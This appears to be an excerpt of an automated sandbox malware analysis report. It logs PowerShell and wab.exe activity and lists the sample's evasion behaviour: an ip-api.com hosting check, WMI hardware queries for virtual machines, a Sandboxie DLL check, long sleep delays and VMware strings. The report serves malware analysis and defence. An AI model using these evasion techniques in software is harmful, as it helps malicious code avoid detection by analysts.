            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22070000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5090Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4724Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7672Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2194Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5920Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3884Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104Thread sleep count: 7672 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep count: 2194 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6304Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4216Thread sleep count: 5920 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99874s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4216Thread sleep count: 3884 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99655s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99546s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99202s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -99088s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98966s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98859s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98749s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98637s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98530s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98421s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98311s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98093s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97983s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97874s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97546s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97327s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97090s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96981s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96869s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96746s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96638s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96508s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96396s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -96276s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -95958s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -95828s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -95691s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -95359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -95228s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -95078s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -94937s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -94132s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93975s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93808s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93683s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93577s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93465s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93358s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93249s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93132s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -93028s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92917s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92812s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92702s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92593s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92482s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92374s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -92156s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -91964s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99874Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99655Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99546Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99088Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98966Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98749Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98637Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98530Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98421Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98311Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97983Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97874Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97546Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97327Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97090Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96981Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96869Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96746Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96638Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96508Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96396Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96276Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95958Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95691Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95228Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95078Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94937Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94132Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93975Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93808Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93683Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93577Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93465Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93358Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93249Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93132Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 93028Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92917Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92812Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92702Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92593Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92482Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92374Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92265Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 92156Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 91964Jump to behavior
            Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: newfile.exe, 00000018.00000002.2053144761.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
            Source: powershell.exe, 00000005.00000002.2075429320.00000225F4C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
